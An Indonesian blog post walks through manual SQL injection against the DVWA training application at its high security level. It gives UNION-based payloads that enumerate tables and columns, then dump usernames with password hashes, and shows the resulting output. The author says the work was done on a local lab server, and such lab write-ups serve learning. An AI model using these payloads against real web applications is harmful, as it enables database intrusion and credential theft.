SQL Injection Challenge DVWA High Level Security

Sunday, November 29, 2015

Banyak yang bilang SQL Inject di DVWA Level High 'impossible' untuk dipecahkan, karena kemungkinan hanya bisa dibobol jika ditemuka teknik 0day. Padahal setelah dicoba ternyata malah lebih mudah dari yang dibayangkan. hanya saja, kita harus melakukan inject secara manual , tidak bisa menggunakan sqlmap seperti di level low ataupun medium.
Sebelum melakukan SQLi, pastikan dulu level security nya di set ke high.
Ok, lets see how its work.

Saat kita menginput query 1' OR 1=1 , maka hasilnya error.
Coba lagi dengan query 1' OR 1=1# . # difungsikan untuk mengabaikan queri injeksi sehingga hasilnya tidak error.
Langsung injeksi lagi untuk melihat versi nya.
1' OR 1=1 UNION SELECT null, version()#
Lakukan injeksi lagi untuk melihat semua tabel yang berhubungan dengan kata 'user' .
1' OR 1=1 UNION SELECT null, table_name FROM INFORMATION_SCHEMA.tables WHERE table_name LIKE 'user%'#
Terlalu banyak output, kita coba tabel yang lebih spesifik.
1' OR 1=1 UNION SELECT null, column_name FROM INFORMATION_SCHEMA.columns WHERE table_name='users'#
Terdapat kolom user, dan password.
Saatnya injeksi terakhir.
1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#

ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: admin
fadd3eabf52e8a9b5ada3b210d666cc8

ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: gordonb
e99a18c428cb38d5f260853678922e03

ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: 1337
8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: pablo
0d107d09f5bbe40cade3de5c71e9e9b7

ID: 1' OR 1=1 UNION SELECT null, concat(user,0x0a,password) FROM users#
First name:
Surname: smithy
5f4dcc3b5aa765d61d8327deb882cf99

Target pwned.
Sekian tutor kali ini , semoga bermanfaat.

NB :
Tutorial ini dilakukan menggunakan local server dan DVWA sehingga bukan tindakan illegal dan merugikan orang lain.

Artikel Terkait DVWA ,Linux ,Security

No comments:

Post a Comment